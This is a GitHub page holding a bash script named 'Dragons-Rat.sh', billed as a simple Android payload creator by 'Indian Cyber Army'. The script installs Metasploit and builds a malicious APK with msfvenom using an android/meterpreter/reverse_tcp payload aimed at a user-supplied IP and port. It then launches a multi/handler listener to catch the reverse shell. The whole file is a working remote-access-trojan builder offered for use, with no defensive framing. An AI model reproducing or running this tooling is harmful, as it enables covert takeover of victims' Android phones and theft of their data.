-
Notifications
You must be signed in to change notification settings - Fork 1
/
Dragons-Rat.sh
79 lines (63 loc) · 2.69 KB
/
Dragons-Rat.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#!/bin/bash
echo "Checking For Root User...."
sleep 1
if [[ $(id -u) -ne 0 ]] ; then
echo "You are Not Root! Please Run as root" ; exit 1 ;
else echo "Checking For Requirement Packages.." ;
fi
pkgs=(metasploit-framework)
for pkg in ${pkgs[@]}
do
sudo apt install $pkg
done
sleep 1
clear
echo "Required Packages Has Been Installed Sucessfully"
clear
cat<< EOF
____ ____ _ ____ ___ _ _ ____ ____ _ _____
| _ \| _ \ / \ / ___|/ _ \| \ | / ___| | _ \ / \|_ _|
| | | | |_) | / _ \| | _| | | | \| \___ \ _____| |_) | / _ \ | |
| |_| | _ < / ___ \ |_| | |_| | |\ |___) |_____| _ < / ___ \| |
|____/|_| \_\/_/ \_\____|\___/|_| \_|____/ |_| \_\/_/ \_\_|
____________________A SIMPLE PAYLOAD CREATOR TOOL_____________________
FOR ANDROID ONLY
MADE BY: INDIAN CYBER ARMY
YOUTUBE CHANNEL: https://www.youtube.com/@indiancyberarmy5
EOF
read -p " a) Create a payload
b) Execute the listener for previous R.A.T
enter a or b (Default a) ===> " ab
case $ab in
a) echo Creating a payload ...;;
b) echo Executing the listener ...;
bash src/src.sh
esac
read -p " Enter your IP Address ===> " ip
read -p " Enter listener port ===> " Port
read -p "|---Set the name and path to save the payload
|----> " Path
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$Port - apk -o $Path
clear
cat<< EOF
____ ____ _ ____ ___ _ _ ____ ____ _ _____
| _ \| _ \ / \ / ___|/ _ \| \ | / ___| | _ \ / \|_ _|
| | | | |_) | / _ \| | _| | | | \| \___ \ _____| |_) | / _ \ | |
| |_| | _ < / ___ \ |_| | |_| | |\ |___) |_____| _ < / ___ \| |
|____/|_| \_\/_/ \_\____|\___/|_| \_|____/ |_| \_\/_/ \_\_|
____________________A SIMPLE PAYLOAD CREATOR TOOL_____________________
FOR ANDROID ONLY
MADE BY: INDIAN CYBER ARMY
YOUTUBE CHANNEL: https://www.youtube.com/@indiancyberarmy5
EOF
read -p "Do you want to Execute the listener?
y) Execute the listener
n) Exit
enter y or n (Default y) ===> " yn
case $yn in
y) echo Executing the listener ...;;
n) echo exiting ...;
sleep 1
exit 1
esac
msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $ip; set lport $Port; exploit;"